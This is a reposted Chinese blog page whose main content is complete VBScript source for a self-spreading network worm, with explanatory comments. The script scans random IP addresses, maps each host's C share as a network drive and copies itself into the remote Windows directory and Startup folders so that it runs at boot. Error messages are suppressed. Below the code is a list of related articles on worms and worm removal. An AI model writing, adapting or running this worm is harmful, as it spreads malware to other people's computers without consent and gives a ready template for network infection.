一个非常简单那的蠕虫病毒（转）

dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = "0"
dot = "."
driveconnected="0"

set wshnetwork = wscript.createobject("wscript.network") '实现网上邻居共享文件夹的搜索与文件操作的对象
Set fso1 = createobject("scripting.filesystemobject") '创建一个文件系统对象
set fso2 = createobject("scripting.filesystemobject")
on error resume next '如果出现错误，直接跳过，防止弹出错误窗口

randomize '用一随机数初始化内置的随机数生成器（大于0少于1）
checkfile() '创建newwork.log文件
randaddress() '产生一个随机的ip地址

do
do while driveconnected = "0"
checkaddress() '检查地址
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename '生成一个映射盘
enumdrives() '找到了映射的共享盘就copy文件感染
loop
copyfiles() '感染
disconnectdrive()
loop

msgbox "Done"

function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function createlogfile()
Set myfile = fso1.createtextfile("c:/network.log", True)
end function

function checkfile()
If (fso1.fileexists("c:/network.log")) then
fso1.deletefile("c:/network.log")
createlogfile()
else
createlogfile()
end If
myfile.writeLine("Log file Open")
end function

function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")

fso.copyfile "c:/network.vbs", "j:/"

If (fso2.FileExists("j:/network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename)
End If

fso.copyfile "c:/network.vbs", "j:/windows/startm~1/programs/startup/"

fso.copyfile "c:/network.vbs", "j:/windows/"

fso.copyfile "c:/network.vbs", "j:/windows/start menu/programs/startup/"

end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "//" & octa & dot & octb & dot & octc & dot & octd & "/C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
' driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1) '生成一个小于255的随机数
end function

function randaddress()
if count < 50 then
octa=Int((16) * Rnd + 199) '生成一个199-215的随机数?
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
end function

一个非常简单那的蠕虫病毒（转）相关推荐

爬虫你的主机中的软件中止了一个已建立的连接_Docker Hub上镜像发现挖矿蠕虫病毒，已导致2000台主机感染...
点击上方"民工哥技术之路"选择"星标" 每天10点为你分享不一样的干货读者福利!多达 2048G 各种资源免费赠送安全公司Palo Alto Networ ...
杀毒奇招：用安全网关消灭蠕虫病毒（转）
自1988年出现第一个蠕虫病毒以来,计算机蠕虫病毒以其快速.多样化的传播方式不断给网络世界带来灾害.特别是网络的迅速发展令蠕虫造成的危害日益严重,造成一个谈毒色变的的网络世界. 不同于一般的病毒,蠕虫 ...
教你怎样用安全网关消灭蠕虫病毒（转）
自1988年出现第一个蠕虫病毒以来,计算机蠕虫病毒以其快速.多样化的传播方式不断给网络世界带来灾害.特别是网络的迅速发展令蠕虫造成的危害日益严重,造成一个谈毒色变的的网络世界. 不同于一般的病毒,蠕虫 ...
感染＜SCRIPT Language=VBScript＞ DropFileName = “svchost.exe” Ramnit 蠕虫病毒 HTML清除工具
最近开发一个web项目,html文件在尾部老是自动生成一串乱码,如下图网上搜了下是电脑已经感染了Ramnit 蠕虫病毒,搜了一遍专杀工具各种收费,基本放弃.无奈电脑有太多东西,重装又浪费时间,时间成 ...
如何利用交换机处理蠕虫病毒的入侵？（转）
互联网蠕虫的泛滥在最近几年造成了巨大的损失,让很多服务运营商和企业网络的管理员甚为头疼的不仅是其不断的发展变种,而且发作造成的损害也越来越严重.尽管蠕虫本身通常并不破坏任何的数据,但它所带来的直接和间 ...
Morto蠕虫病毒分析报告
文章目录样本信息病毒现场复现分析过程 Loader部分 Payload部分病毒查杀样本信息名称:cache.txt SHA1:a5f83e3baae0df2cdcf5b7e9e862705 ...
快速有效地封杀—巧利用Iris来查找蠕虫病毒(转)
快速有效地封杀-巧利用Iris来查找蠕虫病毒(转) 近些年,蠕虫病毒的每一次大规模爆发,都给网络世界带来了深重的灾害.蠕虫病毒有着很强的破坏性,一个局域网中只要有一台电脑感染了蠕虫病毒,就有可能引起网 ...
Net-Worm.Win32.Kido.ih蠕虫病毒分析+专杀工具源代码+手工清除全过程
Net-Worm.Win32.Kido.ih蠕虫病毒分析+专杀工具源代码+手工清除全过程 ...
Docker Hub上镜像发现挖矿蠕虫病毒，已导致2000台主机感染
点击上方"民工哥技术之路"选择"星标" 每天10点为你分享不一样的干货安全公司Palo Alto Networks威胁情报小组Unit 42发现一种新型的 ...

一个非常简单那的蠕虫病毒（转）

一个非常简单那的蠕虫病毒（转）相关推荐

最新文章

热门文章